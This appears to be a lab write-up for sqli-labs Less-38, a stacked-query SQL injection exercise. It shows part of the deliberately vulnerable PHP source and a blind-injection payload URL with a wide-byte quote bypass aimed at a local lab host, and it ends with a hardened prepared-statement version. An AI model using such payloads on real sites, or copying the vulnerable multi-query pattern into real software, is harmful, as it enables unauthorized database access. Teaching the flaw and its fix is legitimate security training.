sqli-Labs————less-38

Less-38

[Image 1: sqli-Labs less-38]

Source code:






Less-38 **stacked Query**



Welcome    Dhakkan
```php
// (The beginning of the listing, up to the first echo, is not preserved on this page.)
            printf("Your Username is : %s", $row[1]);
            echo "\n";
            printf("Your Password is : %s", $row[2]);
            echo "\n";
            echo "\n";
        }
        // mysqli_free_result($result);
    }
    /* print divider */
    if (mysqli_more_results($con1))
    {
        //printf("-----------------\n");
    }
    //while (mysqli_next_result($con1));
}
else
{
    echo '';
    print_r(mysqli_error($con1));
    echo "";
}
/* close connection */
mysqli_close($con1);
}
else { echo "Please input the ID as parameter with numeric value";}
?>
```



Based on the SQL statement above, the payload can be constructed directly as follows:

Visible (in-band) injection:

[Image 2: sqli-Labs less-38]

Blind injection:

http://192.168.11.136/sqli-labs/Less-38?id=-1%df'||1--+

[Image 3: sqli-Labs less-38]

We can also achieve this with stacked-query injection:

[Image 4: sqli-Labs less-38]
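As an added example (not part of the original post or the sqli-labs source): the `mysqli_more_results` / `mysqli_next_result` handling in the listing belongs to the multi-statement API (`mysqli_multi_query`), which is what lets a second statement run. The sketch below is the hardened counterpart, using one prepared statement with a bound integer. The query text, the `users` table, the function name `fetch_user` and the `DB_*` environment variables are assumptions.

```php
<?php
// Added example: single-statement, parameterized lookup.
// Assumed: table `users` whose 2nd column is the username (matching $row[1]
// in the listing); DB_HOST / DB_USER / DB_PASS / DB_NAME are placeholders.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

function fetch_user(mysqli $con, $rawId): ?array
{
    // Accept only a positive integer; quotes, ';' or stray bytes fail validation.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // A prepared statement holds exactly one statement, and the bound value
    // is sent as data, never parsed as SQL text.
    $stmt = mysqli_prepare($con, 'SELECT * FROM users WHERE id = ? LIMIT 1');
    mysqli_stmt_bind_param($stmt, 'i', $id);
    mysqli_stmt_execute($stmt);
    $result = mysqli_stmt_get_result($stmt);   // requires the mysqlnd driver
    $row = mysqli_fetch_row($result);
    mysqli_stmt_close($stmt);
    return $row ?: null;
}

if (isset($_GET['id'])) {
    try {
        $con = mysqli_connect(getenv('DB_HOST'), getenv('DB_USER'),
                              getenv('DB_PASS'), getenv('DB_NAME'));
        mysqli_set_charset($con, 'utf8mb4');   // fix the connection charset explicitly
        $row = fetch_user($con, $_GET['id']);
        mysqli_close($con);
        if ($row === null) {
            echo 'No matching user (the ID must be a positive integer)';
        } else {
            printf('Your Username is : %s', htmlspecialchars((string) $row[1]));
        }
    } catch (mysqli_sql_exception $e) {
        // Log server-side instead of printing mysqli_error() to the client.
        error_log($e->getMessage());
        http_response_code(500);
        echo 'Internal error';
    }
}
```

The database account used by the application should also hold only the privileges the page needs (here, `SELECT` on the one table), which limits what any injected statement could do.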

